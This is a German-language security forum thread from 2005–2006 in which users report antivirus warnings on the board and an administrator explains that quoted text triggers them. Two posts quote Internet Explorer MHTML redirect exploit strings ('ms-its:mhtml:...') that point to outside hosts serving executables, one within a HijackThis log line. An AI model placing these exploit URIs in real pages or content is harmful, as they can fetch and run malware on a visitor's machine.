Trojaner / Virus im Protecus Board?

#0
12.02.2005, 15:33
...neu hier

Beiträge: 9
#1 Achtung! - einige Virenscanner melden beim Aufruf dieses Themas einen Virus!
hierbei handelt es sich um ein Fehlalarm bzw. um Überempfindlichkeit einiger Virenscanner! ... mehr Infos im Thread
- Gruß Administration

hallo Freunde,
letzte Woche war ich wieder mal seit langem hier im Board, habe aber leider einen Trojaner geschnapt auf der seite:
http://board.protecus.de/t15120.htm

Ich bitte um das zu säubern (zu klären), zu den interessenten.

mfg
Seitenanfang Seitenende
12.02.2005, 15:38
Administrator
Avatar Lukas

Beiträge: 1742
#2 mmmh, okay ich schreibe demnächst mal öffentlich was dazu!

leider schlagen manche hypersensiblen Programme auf manchen Seiten Alarm
anscheinend besonders gerne bei diesem Thema

Zitat

beim ausführen eines im Forum geposteten tops
Home » Viren, Trojaner & Malware Forum » Themenübersicht
das Thema kennt jemand Worm/RBot.100074.

Spuckt mein AV Guard ne Virenwarnung aus kann das sein??

Wenn ja wäre es nett das Thema zu löschen, wäre schade wenn man sich im Forum infiziert.

Gruß

Joe

Anitvir Guard für WinXP in der Version 6.28.00.02 AVE 6.29.0.8 VDF 6.29.0.95.
Antivir reagiert hier wirklich über und zwar mit dem Internet Explorer und zwar bei dieser Zeile:
ms-its:mhtml:file://C:\foo.mht!http://81.211.105.37/33/online.chm::/on-line.exe

habs im Thread selber editiert!
__________
Gruß Lukas :yo
Seitenanfang Seitenende
13.02.2005, 08:55
Ehrenmitglied
Avatar Robert

Beiträge: 2283
#3 Also, bei mir hat bei diesem Thread der McAfee angeschlagen: Exploit-MhtRedir.gen

R.
__________
powered by http://different-thinking.de - Netze, Protokolle, Sicherheit, ...
Seitenanfang Seitenende
13.02.2005, 14:09
Administrator
Avatar Lukas

Beiträge: 1742
#4 ... sind wohl einige Scanner die sogar ohne Heuristik etwas "zu" sensibel sind.
lt. Boardsuche ist das hier der einzige Thread - wo der Code noch Blanko drin ist.

siehe auch:
http://thwboard.de/forum/showtopic.php?threadid=6460
__________
Gruß Lukas :yo
Seitenanfang Seitenende
28.12.2005, 13:54
Administrator
Avatar Lukas

Beiträge: 1742
#5 da ich immer wieder Mails bekomme, habe ich mal einen kleinen Fix eingebaut.
d.h. eigentlich sollten die Virenscanner nun nicht mehr anschlagen! - bitte an diesem Thread überprüfen!

Die Hauptproblem Scanner sind eigentlich Antivir, ClamAV (sowieso bekannt für Fehlalarme) und Mcafee und Norton! - eventuell sollte man die mal informieren!
__________
Gruß Lukas :yo
Seitenanfang Seitenende
30.04.2006, 15:22
Administrator
Avatar Lukas

Beiträge: 1742
#6 ...und es geht lustig weiter... - diese Fehlalarme von Antivir sind mitlerweile eine ziemliche Zumutung!

Code

O16 - DPF: {2456741B-1567-7682-A355-939856783603} - ms-its:mhtml:file://c:\default.mht!http://perou-voyage.com/free/load.chm::/tibs.exe
löst beim Internet Explorer + Antivir ebenfalls einen Fehlalarm aus!! ;)
__________
Gruß Lukas :yo
Seitenanfang Seitenende
Um auf dieses Thema zu ANTWORTEN
bitte erst » hier kostenlos registrieren!!

Folgende Themen könnten Dich auch interessieren: